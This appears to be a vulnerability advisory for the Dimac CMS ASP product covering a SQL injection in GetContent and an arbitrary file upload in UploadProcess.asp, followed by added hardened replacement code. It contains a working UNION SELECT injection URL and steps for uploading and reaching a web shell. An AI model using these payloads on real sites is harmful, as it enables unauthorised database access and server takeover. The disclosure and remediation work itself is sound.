Software: Dimac CMS (asp version)
Software Link: http://dimac.net
Version: >=1.3
SQL injection
********************
file: Template1.asp
Code (ASP):
<!--#include file="../../../GlobalResources/Scripts/GlobalData.asp"-->
<!--#include file="../Scripts/TemplateFunctions.inc"-->
...
Dim vDocId
vDocId = Request.QueryString("DocID").Item
...
file: \SiteResources\data\scripts\TemplateFunctions.inc
Code (ASP):
...
'---------------------------------------------
': GetContent
'---------------------------------------------
Function GetContent( xID )
    Dim vDocId
    Dim Conn, Rs, SQL
    Dim dContent, xPos
    vDocId = Request.QueryString("DocID").Item
    Set Conn = Server.CreateObject("ADODB.Connection")
    Set Rs = Server.CreateObject("ADODB.Recordset")
    Conn.Open GetConStr (GetdbPath)
    ' xID is the raw DocID query-string value; it is concatenated into the SQL text without any validation or parameter binding
    SQL = "SELECT DocContent FROM Documents WHERE DocumentID=" + xID
    Rs.Open SQL, Conn
...
Exploit: The admin account is stored in the config file, so this is all that can be pulled from the database:
host/SiteResources/Data/Templates/Template1.asp?DocID=-1 union select name from MSysObjects
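A hardened GetContent, added here as an example and not taken from Dimac's code. It keeps the helpers the page's own function calls (GetConStr, GetdbPath) and the Documents/DocumentID schema shown above, and assumes the Jet/ACE OLE DB provider used for the Access database accepts "?" parameter markers through ADODB.Command, which it does. DocID is first checked to be a plain integer and then bound as a typed parameter, so the value never becomes part of the SQL text:

```vbscript
' Hardened replacement for GetContent (added example, not Dimac CMS code).
' Assumes the same helpers the original calls: GetConStr and GetdbPath.
Const adInteger    = 3   ' ADO DataTypeEnum value, so adovbs.inc is not required
Const adParamInput = 1   ' ADO ParameterDirectionEnum value

' True only for a short string of decimal digits with an optional leading minus.
' IsNumeric is deliberately not used: it also accepts "1e3", "&H1F" and "1.5".
Function IsPlainInteger( s )
    Dim Re
    Set Re = New RegExp
    Re.Pattern = "^-?\d{1,9}$"
    IsPlainInteger = Re.Test(CStr(s))
End Function

'---------------------------------------------
': GetContent (hardened)
'---------------------------------------------
Function GetContent( xID )
    Dim Conn, Cmd, Rs

    ' 1. Validate the input before it is used anywhere.
    If Not IsPlainInteger(xID) Then
        Response.Status = "400 Bad Request"
        Response.End
    End If

    Set Conn = Server.CreateObject("ADODB.Connection")
    Conn.Open GetConStr(GetdbPath)

    ' 2. Bind the value as a typed parameter; the SQL text never contains it,
    '    so no user-supplied characters can change the statement's structure.
    Set Cmd = Server.CreateObject("ADODB.Command")
    Set Cmd.ActiveConnection = Conn
    Cmd.CommandText = "SELECT DocContent FROM Documents WHERE DocumentID = ?"
    Cmd.Parameters.Append Cmd.CreateParameter("DocID", adInteger, adParamInput, , CLng(xID))

    Set Rs = Cmd.Execute

    If Not Rs.EOF Then
        GetContent = Rs("DocContent").Value
    Else
        GetContent = ""
    End If

    Rs.Close
    Conn.Close
End Function
```

Template1.asp would call this as before with Request.QueryString("DocID").Item; the regular-expression check alone already turns the request shown above into a 400, and the parameter binding is the second, independent layer in case a caller ever passes the value in some other way.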
Insecure file upload
********************
Arbitrary file upload is possible.
file: \CMSadmin\MediaArchive\images\UploadProcess.asp
Code (ASP):
...
FILEFLAG = err.number
on error goto 0
if FILEFLAG = 0 then
    ContentType = UploadRequest.Item("inpFile").Item("ContentType")
    FilePathName = UploadRequest.Item("inpFile").Item("FileName")
    FileName = Right(filepathname,Len(filepathname)-InstrRev(filepathname,"\"))
    Value = UploadRequest.Item("inpFile").Item("Value")
else
    FileName = ""
end if
' FileName, extension included, is taken from the client and the target directory is served by IIS; neither the name nor the content type is checked
xPath = Server.MapPath("..\..\..\SiteResources\Data\images\") + "\" + FileName
...
Exploit: Upload a web shell at
host/CMSadmin/MediaArchive/images/upload.asp. It then shows up at
host/SiteResources/Data/images/_webshell_name_
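A hardened storage step for UploadProcess.asp, added here as an example and not Dimac's code. It reuses the page's UploadRequest object and assumes its "Value" item is a binary byte array (as it is in the common pure-ASP upload classes), and it assumes an UPLOAD_ROOT directory outside the web root, a placeholder path chosen for this example. The three properties the original lacks are a positive extension list, a check of the file's leading bytes against the claimed type, and a server-generated file name:

```vbscript
' Hardened storage step for UploadProcess.asp (added example, not Dimac CMS code).
' Assumes the page's UploadRequest object, whose "Value" item is a binary byte
' array, and an assumed directory UPLOAD_ROOT that lies outside the web root
' so nothing written there is ever executed or served directly by IIS.
Const UPLOAD_ROOT  = "D:\DimacData\uploads\"   ' assumed path, not from the product
Const ALLOWED_EXTS = "|jpg|jpeg|png|gif|"      ' positive list; everything else is refused

' Checks that the first bytes match the type the extension claims.
' Content-Type and the client's file name are not trusted for this.
Function HasImageMagic( Bytes, Ext )
    Dim i, Head
    HasImageMagic = False
    If LenB(Bytes) < 4 Then Exit Function
    Head = ""
    For i = 1 To 4
        Head = Head & Right("0" & Hex(AscB(MidB(Bytes, i, 1))), 2)
    Next
    Select Case Ext
        Case "png":         HasImageMagic = (Head = "89504E47")
        Case "jpg", "jpeg": HasImageMagic = (Left(Head, 6) = "FFD8FF")
        Case "gif":         HasImageMagic = (Left(Head, 6) = "474946")   ' "GIF"
    End Select
End Function

' Returns the server-side path the file was written to, or "" when rejected.
Function SafeStoreUpload()
    Dim FilePathName, Bytes, DotPos, Ext, SafeName, Stm

    SafeStoreUpload = ""

    FilePathName = UploadRequest.Item("inpFile").Item("FileName")
    Bytes        = UploadRequest.Item("inpFile").Item("Value")

    ' 1. Extension must exist and be on the positive list (exact, case-folded match).
    DotPos = InStrRev(FilePathName, ".")
    If DotPos = 0 Then Exit Function
    Ext = LCase(Mid(FilePathName, DotPos + 1))
    If InStr(1, ALLOWED_EXTS, "|" & Ext & "|") = 0 Then Exit Function

    ' 2. Content must look like that image type.
    If Not HasImageMagic(Bytes, Ext) Then Exit Function

    ' 3. Never reuse the client's name: build one from a GUID plus the vetted
    '    extension, so separators, "..", or ";" in FileName never reach the disk.
    SafeName = Replace(Mid(Server.CreateObject("Scriptlet.TypeLib").Guid, 2, 36), "-", "") & "." & Ext

    ' 4. Write the bytes with ADODB.Stream into the non-web-served directory.
    Set Stm = Server.CreateObject("ADODB.Stream")
    Stm.Type = 1            ' adTypeBinary
    Stm.Open
    Stm.Write Bytes
    Stm.SaveToFile UPLOAD_ROOT & SafeName, 2   ' adSaveCreateOverWrite
    Stm.Close

    SafeStoreUpload = UPLOAD_ROOT & SafeName
End Function
```

Because the files no longer live under \SiteResources\Data\images\, the media archive has to serve them through a small ASP handler that reads from UPLOAD_ROOT and sets the Content-Type itself; that handler only ever returns bytes, so even a file that slipped past the checks could not run as script. Keeping the extension whitelist and the magic-byte check together matters: either one alone would accept a file the other rejects.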